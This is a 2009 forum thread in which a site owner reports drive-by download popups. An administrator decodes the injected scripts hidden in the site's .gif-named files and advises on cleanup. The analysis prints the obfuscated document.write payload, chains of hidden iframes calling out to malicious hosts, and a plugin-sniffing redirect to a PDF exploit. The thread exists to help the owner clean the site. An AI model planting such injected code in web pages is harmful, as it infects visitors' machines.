Author Topic: Malware attack on my sites  (Read 13899 times)

0 Members and 1 Guest are viewing this topic.

March 28, 2009, 11:50:40 pm
Read 13899 times

smtemp

  • Newbie

  • Offline
  • *

  • 2
Please help me identify and remove these malware from my sites D:  I went to visit my sites and I got these errors. (One version is in Safari and another is in FireFox) I use a mac.

http://i17.photobucket.com/albums/b53/smtemp/Picture6.png
http://i17.photobucket.com/albums/b53/smtemp/Picture7.png

I'm going to my own websites and these stupid things pop up and try to force me to download a .pdf. I force cancel before it gets to far though. I believe my website host must have been hacked or something.. I can't find anything abnormal in my own code on my sites which are:
http://www.anicoz.com
http://www.ratemycosplay.com

Please help D:

March 29, 2009, 12:13:17 am
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
The code in imgratemycosplay_com.gif Decodes to;

Code: [Select]
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,97,115,114,101,116,111,107,102,105,110,46,99,111,109,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62));
Which decodes to;

Code: [Select]
<iframe src="http://dasretokfin.com/index.php" width="0" height="0" style="display:none;"></iframe>
Which contains yet more encoded JS that leads to a fake codec.

The code in imgratemycosplay_com-2.gif decodes to;

Code: [Select]
window.status='Done';document.write('<iframe name=282620 src="http://8speed.org/t/?'+Math.round(Math.random()*12002)+'282620'+'" width=353 height=34 style="display:none"></iframe>')
Which loads;

Code: [Select]
<iframe name=9619574bea1 src='http://sexbases.cn/in.cgi?16&cc5f86' width=106 height=52 frameborder='0'></iframe>
Which loads (changed html to hxml to prevent problems with BBCode breakout);

Code: [Select]
<hxml><frameset rows="100%"><frame src="http://sexbases.cn/edit.html"></frameset></hxml>
Which loads;

Code: [Select]
<iframe src=http://firstgate.ru/33/tr.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://sexbases.cn/gr.php width=1 height=1 style="display:none"></iframe>

firstgate.ru loads a PDF exploit and sexbases.cn loads;

Code: [Select]
<iframe src=http://peskufex.cn/ss/in.cgi?9 width=1 height=1 style="display:none"></iframe>
Which loads another PDF exploit, courtesy of;

Code: [Select]
function PDF()
{
for (var i=0;i<navigator.plugins.length;i++) {
var name = navigator.plugins[i].name;
if (name.indexOf("Adobe Acrobat") != -1) {
                                                                 location.href = "spl/pdf.pdf";
}
}

}
PDF();

The code in imgratemycosplay_com-3.gif decodes to;

Code: [Select]
window.status='Done';document.write('<iframe name=c5642 src="http://8speed.org/t/?'+Math.round(Math.random()*15808)+'c5642'+'" width=208 height=76 style="display:none"></iframe>')
Which is the same as imgratemycosplay_com-2.gif
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 29, 2009, 12:14:53 am
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
To remove these, first and foremost, get your site offline whilst the server is checked to ensure the server itself hasn't been exploited. If the server is clean, upload a CLEAN copy of your sites files, and have your host identify and fix, whatever vulnerability allowed them to get in in the first place.

In addition to this, ensure FTP and all other passwords, are changed ASAP.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 29, 2009, 12:18:54 am
Reply #3

smtemp

  • Newbie

  • Offline
  • *

  • 2

March 29, 2009, 12:22:04 am
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 29, 2009, 09:29:58 am
Reply #5

sowhat-x

  • Guest
You might also wanna have a quick check of your databases for possible problems with a tool like Scrawlr and/or Scrubbr ...both of them are free:
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx
http://www.owasp.org/index.php/Category:OWASP_Scrubbr